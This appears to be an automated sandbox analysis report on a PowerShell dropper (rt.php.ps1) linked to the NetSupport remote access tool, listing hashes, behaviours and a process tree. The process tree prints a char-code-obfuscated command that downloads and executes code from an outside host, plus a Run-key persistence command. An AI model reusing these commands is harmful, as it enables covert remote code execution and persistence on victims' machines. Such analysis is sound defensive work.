Analysis
-
max time kernel
403s -
max time network
1758s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
30/05/2023, 17:14
Static task
static1
Behavioral task
behavioral1
Sample
rt.php.ps1
Resource
win10-20230220-en
Behavioral task
behavioral2
Sample
rt.php.ps1
Resource
win7-20230220-en
Behavioral task
behavioral3
Sample
rt.php.ps1
Resource
win10v2004-20230220-en
General
-
Target
rt.php.ps1
-
Size
2.8MB
-
MD5
03c9a474f0b9196157fec9c94fdca125
-
SHA1
07ae811458835b8f163dbefdbaf29c1c2a190481
-
SHA256
8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
-
SHA512
5227fa992f634c5263c3d32ca0a03c08e0532ebc8d81ddf11376ed5d19c0aa8a1ca9818ea94a60f2e94edfee7d3db0d54151ce11e9095333514b36264dda2664
-
SSDEEP
49152:0iwXDQWRnrRmKulfXDJZZH1ebFgUbqYgXE5BQkGrD:5
Malware Config
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4760 powershell.exe 4 4760 powershell.exe -
Deletes itself 1 IoCs
pid Process 1608 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4896 whost.exe -
Loads dropped DLL 6 IoCs
pid Process 4896 whost.exe 4896 whost.exe 4896 whost.exe 4896 whost.exe 4896 whost.exe 4896 whost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\f9Av6lBR2ENs\\whost.exe" powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 4760 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeSecurityPrivilege 4896 whost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4896 whost.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1608 wrote to memory of 4760 1608 powershell.exe 67 PID 1608 wrote to memory of 4760 1608 powershell.exe 67 PID 4760 wrote to memory of 4836 4760 powershell.exe 69 PID 4760 wrote to memory of 4836 4760 powershell.exe 69 PID 1608 wrote to memory of 3684 1608 powershell.exe 70 PID 1608 wrote to memory of 3684 1608 powershell.exe 70
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps11⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"3⤵PID:4836
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe""2⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exeC:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4896
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD5df1a4ff784a50670244eb782884af91f
SHA10dbcddbafcc416b4b35820d9ae83ee70f63f2d2a
SHA25693445522a6ba5648bd6618ca3ef2a70ee0a767fe87dcb7450aa939860e90f1ae
SHA512eb252587929d2538adc642b0d18c6c94a23a5949262ea11256b2d1b7c108c7f4f95bf66a7d9bfece81bff522c972191867ed44739d76ef5df43d032b53899593
-
Filesize
1KB
MD52a93d653c9708e9b42505380eb60a1da
SHA1abb42a825497e56c3006d53a48d776cc3ff8f5a9
SHA256a91f1a988cf3729c94e1d0d0fda0d379462ae678c487e6d179f5ca1f4e1a948e
SHA51244505d7ee19221379372155a26377ec1e7acc1c34823b0d8bd9e20379cc1e980ead4de8304e02dfe448ee5b642d94e47d7796eef1d13e6179b758217f3173013
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
257B
MD5390c964070626a64888d385c514f568e
SHA1a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f
-
Filesize
3.6MB
MD500587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
Filesize
910B
MD55d2b788f10e973fce372fa2e4ececd4e
SHA140cc5404b896dd6ed657bba39ffdb6d63f45e9a1
SHA256483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475
SHA512168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20
-
Filesize
32KB
MD5dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166
-
Filesize
18KB
MD5a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
Filesize
117KB
MD5c0eb3eac96511077dafc0afa64c6388c
SHA133e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA5122632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc
-
Filesize
117KB
MD5c0eb3eac96511077dafc0afa64c6388c
SHA133e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA5122632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
18KB
MD5a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
Filesize
3.6MB
MD500587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
32KB
MD5dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166